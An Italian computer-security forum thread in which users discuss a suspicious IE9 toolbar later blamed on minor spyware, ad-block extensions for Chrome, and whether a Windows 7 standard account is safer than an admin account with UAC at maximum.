ho selezionato una frase in un post di questa sezione per fare delle ricerche su Google e mi sono ritrovato con una toolbar in alto su IE9 in cui c'era scritto questo (o qualcosa del genere):

"Le impostazioni del tuo router sono state automaticamente modificate e impostate per utilizzare i Norton DNS...", insomma qualcosa di simile.
Capisco che le impostazioni del router sono bypassabili, infatti ultimamente si è discusso di questo e capisco anche che siete bravissimi per quanto riguarda preparazioni in sicurezza informatica ma mi sembra un po eccessivo che qualcuno di voi faccia certi giochetti con un utente del forum e peraltro con uno che non ha mai rotto le scatole a nessuno. Spero che qualcosa del genere non si ripeta più. Grazie

Potresti essere + dettagliato, grazie. [PVT]

A parte che colui che ha fatto questo scherzetto non è riuscito a modificare un bel nulla nel mio router, infatti dopo un controllo ho notato che sul router non mi risultava nessun DNS modificato ne tantomeno altre strane modifiche...
poi per quanto riguarda LastPass ora riesco nuovamente ad accedere dopo aver fatto una pulizia (ma io per sicurezza sostiutisco ugualmente tutte le password).
Non ho idea su cosa si trattasse ma sicuramente è stato un qualcosa di cattivo gusto...

A parte che colui che ha fatto questo scherzetto non è riuscito a modificare un bel nulla nel mio router, infatti dopo un controllo ho notato che sul router non mi risultava nessun DNS modificato ne tantomeno altre strane modifiche...
poi per quanto riguarda LastPass ora riesco nuovamente ad accedere dopo aver fatto una pulizia (ma io per sicurezza sostiutisco ugualmente tutte le password).
Non ho idea su cosa si trattasse ma sicuramente è stato un qualcosa di cattivo gusto...

http://www.hwupgrade.it/forum/showpost.php?p=37665468&postcount=4877 :)

questo è successo selezionando una frase riguardo "antivirus: avira personal 12"

quota il link dove hai selezionato cosi' vediamo cosa c'e' sotto

Consiglio su configurazione di sicurezza su windows 7 64 bit
real time:
1.antivirus: avira personal 12
2.firewall:Private Firewall 7.0.28.1

on demand:
HitmanPro 3.6.0 64bit
Malwarebytes Anti-Malware
Sandboxie (per navigazione su siti sconosciuti e per aprire programmi sconosciuti e potenzialmente infetti)

Browser:
Firefox-Google Chrome-Opera con Adblockplus+Wot

Norton dns A - Security (malware, phishing sites and scam sites) configurati direttamente nel router

Chiedo giudizi sulla configurazione e consigli su eventuali miglioramenti!
Su google chrome ti consiglio Simple Adblock (https://chrome.google.com/webstore/detail/nhfjefnfnmmnkcckbjjcganphignempo)
A me (e sottolineo, a me) le liste di adblock plus non mi si aggiornavano automaticamente.

Provali eventualmente entrambi (prima uno e poi l'altro altrimenti vanno in conflitto) e poi decidi tu ;)

quota il link dove hai selezionato cosi' vediamo cosa c'e' sotto

Grazie per l'interesse ragazzi ma ne ho discusso in privato con un moderatore...siccome si tratta di una parte di testo selezionata (e non specificatamente di un link) e quindi si è poi verificato l'inconveniente, sarebbe meglio non discuterne in pubblico per evitare malintesi con alcuni utenti che magari non c'entrano nulla. :)

Grazie per l'interesse ragazzi ma ne ho discusso in privato con un moderatore...siccome si tratta di una parte di testo selezionata (e non specificatamente di un link) e quindi si è poi verificato l'inconveniente, sarebbe meglio non discuterne in pubblico per evitare malintesi con alcuni utenti che magari non c'entrano nulla. :)

se in pvt mi spieghi cosa e' successo...sono curioso grazie;)

Su google chrome ti consiglio Simple Adblock (https://chrome.google.com/webstore/detail/nhfjefnfnmmnkcckbjjcganphignempo)
A me (e sottolineo, a me) le liste di adblock plus non mi si aggiornavano automaticamente.

Provali eventualmente entrambi (prima uno e poi l'altro altrimenti vanno in conflitto) e poi decidi tu ;)
io ho installato questo adblock (http://code.google.com/p/adblockforchrome/)
Va bene?
Ho appena controllato e risultano aggiornate automaticamente le liste!!!

Ritornando al discorso riguardo l'inconveniente verificatosi in qualche post addietro voglio comunicare agli utenti che ne ho già discusso in privato con un moderatore e con altri utenti del forum e dopo verifiche fatte non è stato notato nulla di anomalo e quindi l'inconveniente è da attribuire ad altre cause probabilmente ad un piccolo spyware non particolarmente dannoso installato sulla cartella Temp di IE9 che cercava a sua volta di installare una toolbar su IE9, spyware non particolarmente dannoso che è stato eliminato con una semplice pulizia e senza lasciare danni.
Mi ero preoccupato più che altro per il discorso che questa toolbar stava per essere sovrapposta alla LastPass toolbar dove tengo salvate tutte le password e quindi non riuscivo più ad accedere alla mia cassaforte...la prima cosa che mi era venuta in mente era qualche ipotetico furbetto che voleva rubarmi le password ma evidentemente non è stato così e quindi chiedo scusa agli utenti per avere creato falsi allarmismi e potete stare tranquilli perchè la navigazione sul forum è sicura. (quando ci sono di mezzo le password la cosa diventa preoccupante...il resto mi interessa relativamente perchè tanto ho il backup di tutti i dati)

Premetto anche che al momento dell'inconveniente mi ero connesso con il PC che vedete in firma ovvero un desktop che ho da poco messo a posto sostituendo vari pezzi tra cui anche il disco rigido, quindi con un sistema operativo appena installato (Windows 7 x64 orginale) ma ancora da completare per quanto riguarda l'installazione dei vari programmi e gli unici programmi installati sono: Avira Premium 2012, LastPass per IE, FlashPlayer, per il resto non è ancora stato installato nient'altro tantomeno Java.
Premetto anche che al momento dell'inconveniente era installato Avira Premium 2012, il sistema era tutto aggiornato e le impostazioni di sicurezza di IE9 erano corrette; per il resto nient'altro, Sandboxie non era ancora stato nemmeno installato. Grazie

Ora ho ricevuto tramite toolbar un avviso di aggiornamento per LastPass: http://i50.tinypic.com/2czzrd1.jpg (http://i50.tinypic.com/2czzrd1.jpg). Che faccio, lo installo o non lo installo questo aggiornamento?:D

Sull'immagine che vedete però sono già sotto Sandboxie, magari sarà anche un aggiornamento legittimo però sapete com'è...si sta arrivando ad un punto in cui non c'è nemmeno da fidarsi a tenere un computer spento :D

Ora ho ricevuto tramite toolbar un avviso di aggiornamento per LastPass: http://i50.tinypic.com/2czzrd1.jpg (http://i50.tinypic.com/2czzrd1.jpg). Che faccio, lo installo o non lo installo questo aggiornamento?:D

Sull'immagine che vedete però sono già sotto Sandboxie, magari sarà anche un aggiornamento legittimo però sapete com'è...si sta arrivando ad un punto in cui non c'è nemmeno da fidarsi a tenere un computer spento :D

l'ultima versione dovrebbe essere la 2.02 tu che versione hai?
nel caso che tu abbia la 2.01,è ovvio che devi aggiornare;)

Ho già aggiornato con le dovute cautele del caso...era un aggiornamento legittimo :p

io ho installato questo adblock (http://code.google.com/p/adblockforchrome/)
Va bene?
Ho appena controllato e risultano aggiornate automaticamente le liste!!!
@kohai
va bene questo adblock?

@kohai
va bene questo adblock?
Come detto da kohai su chrome prova Simple Adblock ;)

@kohai
va bene questo adblock?

Come detto da kohai su chrome prova Simple Adblock ;)

Son tutti validi, poi uno come si trova.
Con adblock plus le liste non mi si aggiornavano automaticamente; simple adblock e' leggero ma a volte sfugge qualcosa al suo controllo; quello da te postato non lo conosco ;)

Ragazzi una domandina veloce: sul mio win 7 64 bit home premium, utilizzo l'utente standard invece di quello amministratore.
L'unico problema e' che a volte gli aggiornamenti (come anche i download), utilizzando quello standard mi vanno a finire nell'account amministratore (sempre del sottoscritto) e mi trovo costretto a saltare da un accont all'altro oppure modificare il percorso dell'aggiornamento.

Domandina: utilizzando comunque l'UAC al massimo, e' piu' sicuro utilizzare l'utente standard o andrebbe bene anche quello amministratore? :stordita:

Un grazie ed un saluto a tutti :)

Ragazzi una domandina veloce: sul mio win 7 64 bit home premium, utilizzo l'utente standard invece di quello amministratore.
L'unico problema e' che a volte gli aggiornamenti (come anche i download), utilizzando quello standard mi vanno a finire nell'account amministratore (sempre del sottoscritto) e mi trovo costretto a saltare da un accont all'altro oppure modificare il percorso dell'aggiornamento.

Domandina: utilizzando comunque l'UAC al massimo, e' piu' sicuro utilizzare l'utente standard o andrebbe bene anche quello amministratore? :stordita:

Un grazie ed un saluto a tutti :)

mah è una corrente di idee, io per comodità uso l'account amministratore, UAC come è appena istallato cioè non al massimo e mi sono sempre trovato bene :D poi se uno è molto paranoico......:rolleyes:

Ragazzi una domandina veloce: sul mio win 7 64 bit home premium, utilizzo l'utente standard invece di quello amministratore.
L'unico problema e' che a volte gli aggiornamenti (come anche i download), utilizzando quello standard mi vanno a finire nell'account amministratore (sempre del sottoscritto) e mi trovo costretto a saltare da un accont all'altro oppure modificare il percorso dell'aggiornamento.

Domandina: utilizzando comunque l'UAC al massimo, e' piu' sicuro utilizzare l'utente standard o andrebbe bene anche quello amministratore? :stordita:

Un grazie ed un saluto a tutti :)

la differenza sostanziale...e' che l'utente standard, blocca le esecuzioni che vogliono privileggi elevati,mentre con uac al massimo, ti viene chiesto il consenso,quindi nel tuo caso sarebbe meglio usare uac al massimo....
sempre che il pc lo usi solo tu,infatti un altro utente potrebbe acconsentire ad una richiesta anomala...
salutoni;)

mah è una corrente di idee, io per comodità uso l'account amministratore, UAC come è appena istallato cioè non al massimo e mi sono sempre trovato bene :D poi se uno è molto paranoico......:rolleyes:

la differenza sostanziale...e' che l'utente standard, blocca le esecuzioni che vogliono privileggi elevati,mentre con uac al massimo, ti viene chiesto il consenso,quindi nel tuo caso sarebbe meglio usare uac al massimo....
sempre che il pc lo usi solo tu,infatti un altro utente potrebbe acconsentire ad una richiesta anomala...
salutoni;)

Utilizzo una password nell'amministratore e mi sono accorto che a volte mi chiede questa come admin, mentre altre volte me la chiede l'UAC.
Il computer a volte lo utilizza anche mio figlio, ma ho returnil attivo.

In verita', con win 7 mi trovo bene, specie in riguardo all'UAC, ma a volte con sto' fatto della differenza fra guest, admin e utente standard, oltre al fatto che ha un sacco di automazioni nascoste che mi rallentano la macchina e che ancora sto scovando, mi sembra un po troppo dispersivo.

Solo stasera cercando info su altri lidi, ho scoperto l'utente standard altro non e' che una specia di finestra, di specchio dell'admin al quale son castrate molte operazioni. Sta di fatto che se ad esempio scarico qualcosa nel percorso dell'utente standard, non me la trovo nell'admin e di riflesso se faccio qualcosa nell'admin, non ce l'ho nello standard.
Ad esempio: per comodita', tutti i download me li faccio scaricare sul desktop; ebbene, con firefox non me li trovavo mai ed ho scoperto invece che anche non avendocelo installato nell'admin ma solo come utente standard, i download me li portava nel desk di quest'ultimo :doh:
E cosi' tutto il resto :(
Eran 2 giorni che sbattevo perche' thunderbird mi diceva di installare l'aggiornamento, e poi ho scoperto che questo me lo metteva nell'admin anche se non ce lo avevo installato: in sede di scaricamento manuale del pacchetto di installazione/aggiornamento, ho dovuto modificare il relativo percorso. . . ecco il perche' della mia domanda.

Cioe': se l'UAC posto al massimo e' sicuro quanto l'utilizzo dell'utente standard, faccio a meno di quest'ultimo e rimango col solo admin.
Se invece vi sono operazioni non visibili ad occhio nudo poiche' in background funziona il blocco/sicurezza dell'utenza limitata (ovvero standard, anche qui ho impiegato un pochino a comprenderlo :rolleyes: ) che offre una protezione aggiuntiva all'UAC, allora mi accontento cosi :fagiano:

Son tutti validi, poi uno come si trova.
Con adblock plus le liste non mi si aggiornavano automaticamente; simple adblock e' leggero ma a volte sfugge qualcosa al suo controllo; quello da te postato non lo conosco ;)

L'ho cercato nello store di google chrome(il primo risultato di ricerca) e devo dire che filtra abbastanza! era giusto per chiedere sull'affidabilità del realizzatore!!!! :D

sul mio win7...utilizzo l'utente standard invece di quello amministratore.
...
utilizzando comunque l'UAC al massimo, e' piu' sicuro utilizzare l'utente standard o andrebbe bene anche quello amministratore? :stordita:
è più sicuro l'utente standard e non è affatto una "corrente di idee" come asserito da jedy,

mah è una corrente di idee, io per comodità uso l'account amministratore, UAC come è appena istallato cioè non al massimo e mi sono sempre trovato bene :D poi se uno è molto paranoico......:rolleyes:
(che poi tu per scelta personale usi l'admin ridotto con soddisfazione è non solo legittimo ma piuttosto un altro paio di maniche :Prrr: )...

Fa proprio al caso nostro (e non per un discorso di paranoia) un (vecchio) thread su Wilders dove chi lo apre si domanda proprio quello che ti sei chiesto te,
Windows 7 Standard user VS Admin (http://www.wilderssecurity.com/showthread.php?t=292685)

Senza scorrerlo tutto (utile, cmq), il nocciolo è contenuto in questo post (Link! (http://www.wilderssecurity.com/showpost.php?p=1825648&postcount=10)) dove, in sostanza, si vede che tutto ruota intorno al discorso delle zone dell'OS "condivise"...
Elevated AAM processes are especially susceptible to compromise because they run in the same user account as the AAM user’s standard-rights processes and share the user’s profile. Many applications read settings and load extensions registered in a user’s profile, offering opportunities for malware to elevate.

1) (giusto per un discorso di cronaca), l'elevazione sotto standard user è tecnicamente chiamata "elevazione oltre il dovuto" (Over The Shoulder elevation) mentre l'elevazione in account amministrativo è il classico AAM o modalità che richiede esplicitamente l'approvazione dell'amministratore (Admin Approval Mode) ma al di là di questo:
la parte "chiave" della frase in inglese di cui sopra è rappresentata dal passo "same user account"/"share the user’s profile"

In sostanza, per il fatto che è identico l'account nel quale si trova ad essere l'utente sia nel caso in cui compia un operazione che richiede privilegi amministrativi (elevated AAM) sia nell'ipotesi opposta in cui l'utente è un semplice "amministratore ridotto" e poichè queste 2 figure condividono lo stesso profilo utente, questa serie di elementi offre il fianco ad attacchi.

Un malware che gira in un account amministrativo non elevato, pur continuando a non avere privilegi di amministratore pieno, può scrivere ad es nel profilo utente (le famose zone condivise...) parti di codice che gli sono necessarie in un 2° momento e aspettare tranquillamente l'elevazione per acquisire i privilegi mancanti.

Se si usa un utente standard, invece, anche là dove ci fosse da dare privilegi maggiori ad un applicazione facendo scattare il popup dell'UAC (che abbiamo visto si chiama OTS Elevation), avrò che questo meccanismo si scontra con il discorso della SEPARAZIONE degli account e degli spazi utente in cui funzionano i processi...

Processes elevated from a standard user account run in a different account from those with standard user rights, so the Windows security model defines a wall around the elevated process that prevents the non-elevated processes from writing code into those that are elevated.
(fonte: http://blogs.technet.com/b/markrussinovich/archive/2007/02/12/638372.aspx)



La materia, cmq, non è banale ma a grandi linee (credo) basti dire che
usare un account limitato è sempre preferibile.


PS: detto questo, non ho capito tutto il gioco che descrivevi...:stordita:

Un malware che gira in un account amministrativo non elevato, pur continuando a non avere privilegi di amministratore pieno, può scrivere ad es nel profilo utente (le famose zone condivise...) parti di codice che gli sono necessarie in un 2° momento e aspettare tranquillamente l'elevazione per acquisire i privilegi mancanti.

questa parte non è proprio spiegata benissimo (spero anzi nell'aiuto di eraser se dovesse leggere questo thread...), ma insomma secondo me siamo sempre li col conto.

Se si usa un HIPS (meglio, un Sandbox), questi problemi sono contenuti (nel senso di neutralizzati).

IMHO

bene bene, documentate copiosamente!! :D

devo darmi l'esame di sicurezza informatica e ci hanno chiesto di mostrare-documentare vulnerabilità, attacchi (più è roba difficile da trovare meglio è, ovviamente), quindi bazzicherò più spesso :D LOL

Buona domenica :)

ciao, cloutz:
fidati cmq solo delle fonti e non certo delle mie interpretazioni :read:

Ma non ti conviene cmq contattare eraser via pvt per farti indirizzare?

ciao, cloutz:
fidati cmq solo delle fonti e non certo delle mie interpretazioni :read:

Ma non ti conviene cmq contattare eraser via pvt per farti indirizzare?

Sicuramente si, ma prima devo studiare per bene il programma del corso per capire cosa potrebbe essere interessante e non banale (il libro di riferimento è un vecchiotto 2007/2008 e non mi pare che si sia parlato di ASLR nel corso :Perfido: ), e poi magari se è il caso lo disturberò..

ma prima di tutto devo formarmi parecchio :read:

gli vuoi presentare qualcosa che, con buona probabilità, hanno sicuramente sentito dire ma, tesi come sono dietro i loro faldoni di libri, hanno toccato sicuramente poco con mano?

La "storia" del rootkit TDL,
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=19

con tanto di sample, analisi e compagnia...

Vivono infatti dietro n-vulnerabilità, hanno meccanismi di impianto diversi a seconda dell'architettura dell'OS, ecc..

è più sicuro l'utente standard e non è affatto una "corrente di idee" come asserito da jedy,


(che poi tu per scelta personale usi l'admin ridotto con soddisfazione è non solo legittimo ma piuttosto un altro paio di maniche :Prrr: )...

Fa proprio al caso nostro (e non per un discorso di paranoia) un (vecchio) thread su Wilders dove chi lo apre si domanda proprio quello che ti sei chiesto te,
Windows 7 Standard user VS Admin (http://www.wilderssecurity.com/showthread.php?t=292685)

Senza scorrerlo tutto (utile, cmq), il nocciolo è contenuto in questo post (Link! (http://www.wilderssecurity.com/showpost.php?p=1825648&postcount=10)) dove, in sostanza, si vede che tutto ruota intorno al discorso delle zone dell'OS "condivise"...
Elevated AAM processes are especially susceptible to compromise because they run in the same user account as the AAM user’s standard-rights processes and share the user’s profile. Many applications read settings and load extensions registered in a user’s profile, offering opportunities for malware to elevate.

1) (giusto per un discorso di cronaca), l'elevazione sotto standard user è tecnicamente chiamata "elevazione oltre il dovuto" (Over The Shoulder elevation) mentre l'elevazione in account amministrativo è il classico AAM o modalità che richiede esplicitamente l'approvazione dell'amministratore (Admin Approval Mode) ma al di là di questo:
la parte "chiave" della frase in inglese di cui sopra è rappresentata dal passo "same user account"/"share the user’s profile"

In sostanza, per il fatto che è identico l'account nel quale si trova ad essere l'utente sia nel caso in cui compia un operazione che richiede privilegi amministrativi (elevated AAM) sia nell'ipotesi opposta in cui l'utente è un semplice "amministratore ridotto" e poichè queste 2 figure condividono lo stesso profilo utente, questa serie di elementi offre il fianco ad attacchi.

Un malware che gira in un account amministrativo non elevato, pur continuando a non avere privilegi di amministratore pieno, può scrivere ad es nel profilo utente (le famose zone condivise...) parti di codice che gli sono necessarie in un 2° momento e aspettare tranquillamente l'elevazione per acquisire i privilegi mancanti.

Se si usa un utente standard, invece, anche là dove ci fosse da dare privilegi maggiori ad un applicazione facendo scattare il popup dell'UAC (che abbiamo visto si chiama OTS Elevation), avrò che questo meccanismo si scontra con il discorso della SEPARAZIONE degli account e degli spazi utente in cui funzionano i processi...

Processes elevated from a standard user account run in a different account from those with standard user rights, so the Windows security model defines a wall around the elevated process that prevents the non-elevated processes from writing code into those that are elevated.
(fonte: http://blogs.technet.com/b/markrussinovich/archive/2007/02/12/638372.aspx)



La materia, cmq, non è banale ma a grandi linee (credo) basti dire che
usare un account limitato è sempre preferibile.


PS: detto questo, non ho capito tutto il gioco che descrivevi...:stordita:
Grazie per la risposta Enne ;)
Vuol dire che rimango con l'utente standard e staro' piu' attento a quando scarico programmi ed aggiornamenti per dargli il percorso corretto, cosi' non dovro' saltellare da un account ad un altro :fagiano:
Per la sandbox, son riuscito a far girare chrome anche sotto di essa (escludendo la sua nativa) come spiegato nel topic di sandboxie :D

Grazie ancora e buon proseguimento di domenica :)

gli vuoi presentare qualcosa che, con buona probabilità, hanno sicuramente sentito dire ma, tesi come sono dietro i loro faldoni di libri, hanno toccato sicuramente poco con mano?

La "storia" del rootkit TDL,
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=19

con tanto di sample, analisi e compagnia...

Vivono infatti dietro n-vulnerabilità, hanno meccanismi di impianto diversi a seconda dell'architettura dell'OS, ecc..

Si, io di questo potrei avere il tempo/la voglia/l'interesse (dato che si tratta di un esamino da 4 crediti e che ho iniziato a lavorare) di trattare solo un aspetto specifico piuttosto che l'analisi di tutto il TDL.

Anche perchè, oltre all'aspetto puramente teorico e affascinante, c'è bisogno di tempo per imparare a usare in pratica disassembler e debugger, saper interpretare le informazioni che ti danno, rinfrescare l'assembly, capire come funziona il OS, ecc.. altrimenti si riduce tutto a un copia e incolla di testo preso da blog qua e là.

Preferisco trattare un singolo aspetto (come si nasconde, come infetta i driver di sistema ecc), ma farlo bene in maniera approfondita e ben documentata da me. :D

Però mi sa che stiamo andando ultra-OT

cosi' non dovro' saltellare da un account ad un altro

è proprio questa la parte che mi interessa:
mi fai un caso pratico?

Te lo chiedo perchè sono anch'io nella stessa situazione...solo che non mi trovo mai a dover saltellare da un account all'altro...:stordita:

Certo, ci sono momenti in cui è inevitabile usare l'UAC per perfezionare determinate operazioni ma, detto questo, niente saltellamenti...:mbe:

aspetta, ho capito:
ma sei su XP?


Se si, è possibile (anzi, probabilissimo...) che le cose funzionino in modo diverso rispetto a Vista/7.

è proprio questa la parte che mi interessa:
mi fai un caso pratico?

Te lo chiedo perchè sono anch'io nella stessa situazione...solo che non mi trovo mai a dover saltellare da un account all'altro...:stordita:

Certo, ci sono momenti in cui è inevitabile usare l'UAC per perfezionare determinate operazioni ma, detto questo, niente saltellamenti...:mbe:

aspetta, ho capito:
ma sei su XP?


Se si, è possibile (anzi, probabilissimo...) che le cose funzionino in modo diverso rispetto a Vista/7.

No, win 7 64 bit home premium.
Ho spiegato tutto qui -> http://www.hwupgrade.it/forum/showpost.php?p=37690712&postcount=4895

Spero sia abbastanza chiaro.

Su xp gia' sapevo che c'era questo "casinotto" :p

No, win 7 64 bit home premium.
Ho spiegato tutto qui -> http://www.hwupgrade.it/forum/showpost.php?p=37690712&postcount=4895

Spero sxia abbastanza chiaro.

Su xp gia' sapevo che c'era questo "casinotto" :p

ripeto,su seven uac al massimo e' uguale ad account standard con l'unica differenza che account standard blocca in automatico le richieste con privilegi i,mentre con uac al massimo livello,entra una schermata protetta che ti chiede se bloccare o meno la richiesta....

ripeto,su seven uac al massimo e' uguale ad account standard con l'unica differenza che account standard blocca in automatico le richieste con privilegi i,mentre con uac al massimo livello,entra una schermata protetta che ti chiede se bloccare o meno la richiesta....

ma ho spiegato poc'anzi che non è assolutamente cosi'...:rolleyes:

admin ridotto = standard user **SOLO** a livello di privilegi & l'UAC non c'incastra una mazza

Cmq è sufficiente rileggere le cose che ho scritto (a patto sempre che si capiscano)...

ma ho spiegato poc'anzi che non è assolutamente cosi'...:rolleyes:

admin ridotto = standard user **SOLO** a livello di privilegi & l'UAC non c'incastra una mazza

Cmq è sufficiente rileggere le cose che ho scritto (a patto sempre che si capiscano)...

ho provato con una serie di malware e ti ripeto che quello che non passa in automatico con account standard,non passa con uac al massimo negandogli la richiesta di privilegi.

Spero sia abbastanza chiaro.

...se ad esempio scarico qualcosa nel percorso dell'utente standard, non me la trovo nell'admin e di riflesso se faccio qualcosa nell'admin, non ce l'ho nello standard.
Ad esempio: per comodita', tutti i download me li faccio scaricare sul desktop; ebbene, con firefox non me li trovavo mai ed ho scoperto invece che anche non avendocelo installato nell'admin ma solo come utente standard, i download me li portava nel desk di quest'ultimo...(tratto da qui (http://www.hwupgrade.it/forum/showpost.php?p=37690712&postcount=4895)).

?

Ma guarda che è normale!!

Sono come 2 spazi separati e indipendenti l'uno dall'altro...

Se l'utente attivo è quello standard, tutto quello che fai nel corso della sessione coinvolge esclusivamente quest'account, non l'altro! (a patto ovviamente che tu non faccia operazioni "straordinarie" che ti fanno scattare il popup dell'UAC [= OTS elevation], nel qual caso la sessione attiva è si quella standard che hai in uso in quel momento ma l'operazione elevata si svolge nell'account elevato producendo un impatto anche su quest'ultimo spazio)

ho provato con una serie di malware e ti ripeto che quello che non passa in automatico con account standard,non passa con uac al massimo negandogli la richiesta di privilegi.

sarà sicuramente come dici ma non hai capito quello che ho scritto pochi post fà a proposito degli "spazi" condivisi, dell'user profile...e di conseguenza perchè NON E' ASSOLUTAMENTE UGUALE utilizzare uno standard user + UAC al massimo o l'admin ridotto + l'UAC al massimo.


Se ti intestardisci qui vuol dire quello che ho detto, e cioè che sei fuori strada.

scattare il popup dell'UAC [= OTS elevation], nel qual caso la sessione attiva è si quella standard che hai in uso in quel momento ma l'operazione elevata si svolge nell'account elevato producendo un impatto anche su quest'ultimo spazio[/SIZE])

l'uac in vista e poi in seven e' stato creato proprio per questo per rendere piu' sicuro l'ambiente admin senza ricorrere all'utente standard,infatti parecchie cose nell' ambiente standard vengono castrate creando quel fastidio che ha khoai ,e a volte e' peggio di un virus.

forse sei rimasto ancora a xp

sarà sicuramente come dici ma non hai capito quello che ho scritto pochi post fà a proposito degli "spazi" condivisi, dell'user profile...e di conseguenza perchè NON E' ASSOLUTAMENTE UGUALE utilizzare uno standard user + UAC al massimo o l'admin ridotto + l'UAC al massimo.


Se ti intestardisci qui vuol dire quello che ho detto, e cioè che sei fuori strada.

nella questione degli ambienti hai pienamente ragione,ma a che prezzo creare quel casino...

lo farei solo se ci fosse in casa un altro utente che acconsente a tutto

è il caso proprio del tizio che apri' la discussione su Wilders ma gli è stato dimostrato che le 2 figure, che apparentemente sembrano equivalenti, di fatto non lo sono.

Ciò non toglie che uno a casa sua possa utilizzare la configurazione che più gli aggrada però è sicuramente bene tener presente che è sbagliato dire che "è uguale", che una corrente (di pensiero) vuole che...



Vuole nulla, è sbagliato e basta.

:)

No, win 7 64 bit home premium.
Ho spiegato tutto qui -> http://www.hwupgrade.it/forum/showpost.php?p=37690712&postcount=4895

Spero sxia abbastanza chiaro.

Su xp gia' sapevo che c'era questo "casinotto" :p

Gli account sono totalmente separati e distinti, hanno vita propria.
Al massimo occhio nelle installazioni se dici di voler installare solo per l'utente corrente o per tutti gli utenti (è ovvio che se lo installi solo per l'utente x, poi entri come admin y e lo avvii -lo trovi perchè magari è indicizzato, te lo vai a pescare te nelle directory di installazione,o perchè per caso si trova nel classpath-, stai eseguendo un programma dell'utente x.. quindi non avrai mai le tue cartelle locali).

Per come la vedo io non dovrebbero esserci problemi di cartelle, perchè non credo che l'admin da cui erediti i privilegi esegua il processo al posto tuo, altrimenti sarebbe un RunAs.

In windows 7 invece è un'elevazione di privilegi, un'ereditarietà di privilegi.
Cioè il tuo account standard eredita privilegi dell'utente "admin".
O meglio, il processo-che-ha-lanciato-l'evento-che-ha-scatenato-la-richiesta-UAC, viene eseguito con i privilegi di admin (ma non è admin ad eseguirlo per te, sei sempre tu ad eseguirlo: sei un account standard con un processo che gira temporaneamente con privilegi da amministratore - come admin).
Quando il processo termina, tu torni ad essere al 100% un account standard.

Credo che sia tu a scrivere sempre sulle tue cartelle, non sulle cartelle dell'utente da cui erediti.
Così credevo..
Ma con la precisazione di nV, possiamo dire che il processo elevato viene di fatto isolato dal contesto, fatto salvo pochi messaggi, per far sì che non subisca accessi strani da altri processi standard user con un IntegrityLevel inferiore.

Però gira sempre nell'ambiente dell'utente elevato, corretto?
O meglio, gira in un nuovo ambiente (passatemi il termine orribile) indirizzato per lo più a processi già legittimati da un IL alto, dialogando con:
- processi IL inferiore (poca roba per sicurezza)
- processi con IL superiore (processi di sistema ecc)

è il caso proprio del tizio che apri' la discussione su Wilders ma gli è stato dimostrato che le 2 figure, che apparentemente sembrano equivalenti, di fatto non lo sono.

Ciò non toglie che uno a casa sua possa utilizzare la configurazione che più gli aggrada però è sicuramente bene tener presente che è sbagliato dire che "è uguale", che una corrente (di pensiero) vuole che...



Vuole nulla, è sbagliato e basta.

:)

infatti e' una domanda che ci siamo posti in tanti ,io per darmi una risposta ho fatto tanti esperimenti e sono arrivato a questa conclusione

i pro dell'account standard sono la sicurezza di far girare i programmi in un ambiente senza privilegi ,e differente dall'ambiente admin
i contro che tante operazioni sei costretto a fare lo switch con l'ambiente admin

mentre se si adotta la filosofia di lasciare l'account standard a favore dell admin e settare l'uac al massimo, rimane la sicurezza di essere avvisati al momento di una richiesta di privilegi elevati,il contro e che si lavora nello stesso ambiente admin.

alla fine se si ha un po di sale nella zucca e si e' l'unico utente del pc io credo che si conviene con la seconda soluzione,quella che ho adottato io.

...se ad esempio scarico qualcosa nel percorso dell'utente standard, non me la trovo nell'admin e di riflesso se faccio qualcosa nell'admin, non ce l'ho nello standard.
Ad esempio: per comodita', tutti i download me li faccio scaricare sul desktop; ebbene, con firefox non me li trovavo mai ed ho scoperto invece che anche non avendocelo installato nell'admin ma solo come utente standard, i download me li portava nel desk di quest'ultimo...(tratto da qui (http://www.hwupgrade.it/forum/showpost.php?p=37690712&postcount=4895)).

?

Ma guarda che è normale!!

Sono come 2 spazi separati e indipendenti l'uno dall'altro...

Se l'utente attivo è quello standard, tutto quello che fai nel corso della sessione coinvolge esclusivamente quest'account, non l'altro! (a patto ovviamente che tu non faccia operazioni "straordinarie" che ti fanno scattare il popup dell'UAC [= OTS elevation], nel qual caso la sessione attiva è si quella standard che hai in uso in quel momento ma l'operazione elevata si svolge nell'account elevato producendo un impatto anche su quest'ultimo spazio)
Praticamente (seven sto ancora imparando ad usarlo bene) ho scoperto, anzi per meglio dire ho capito, che in fase di installazione di un programma e/o di un aggiornamento, bisogna stare attenti al percorso dato oppure preso in automatico.

Con thunderbird ad esempio, pur non avendocelo installato nell'account admin ma solo nell'utente standard (ovvero account limitato), accadeva che gli aggiornamenti del programma me li portava nell'admin (il percorso se lo prendeva in automatico anche se sbagliato, ma non per colpa sua); ho dovuto modificare il percorso dell'aggiornamento manualmente per portarmelo nell'account standard.
Idem con papate per firefox: quando scarico qualcosa, me lo faccio portare sul desktop, ma accadeva che il percorso preso era il desk admin e non il mio :p
Quindi mi ritrovavo un sacco di download nell'admin e non nel mio account che pensavo d'aver perso per un non so quale motivo. Naturalmente firefox lo avevo scaricato come browser nell'account standard e non admin.
Mea culpa. . .
Vorra' dire che d'ora innanzi staro' piu' attento al percorso ecomunque, ho imparato una cosa nuova su seven ;)

P.s.
In verita', avendo preso un HP nuovo con dentro preinstallato un sacco di robaccia che non so nemmeno se posso disinstallare, pena probabilmente un qualche malfunzionamento, il mio sogno e' un'installazione PULITA di win 7 del solo sistema operativo; al resto penserei io :cool:

Ciaoooo :)

In windows 7 invece è un'elevazione di privilegi, un'ereditarietà di privilegi.
Cioè il tuo account standard eredita privilegi dell'utente "admin".
O meglio, il processo-che-ha-lanciato-l'evento-che-ha-scatenato-la-richiesta-UAC, viene eseguito con i privilegi di admin (ma non è admin ad eseguirlo per te, sei sempre tu ad eseguirlo: sei un account standard con un processo che gira temporaneamente con privilegi da amministratore - come admin).

[/COLOR]

e' la filosofia che usano anche molti programmi di sicurezza ,se ci si fida di un programma ,trusted,tutto cio' che fara' sara trusted,almeno che non lo si segua passo passo,ma cio comporta molte richieste...l'importante e rispondere bene alle richieste

io credo che sia necessario ritornare su un passo che ho provato a spiegare non benissimo, questo:
un malware che gira in un account amministrativo non elevato, pur continuando a non avere privilegi di amministratore pieno, può scrivere ad es nel profilo utente (le famose zone condivise...) parti di codice che gli sono necessarie in un 2° momento e aspettare tranquillamente l'elevazione per acquisire i privilegi mancanti.

Ipotesi:
mi loggo come amministratore
l'OS mi assegna di fabbrica privilegi minimi
l'amministratore, di fatto, è dunque un amministratore castrato (o ridotto) e gode praticamente degli stessi privilegi dell'utente standard
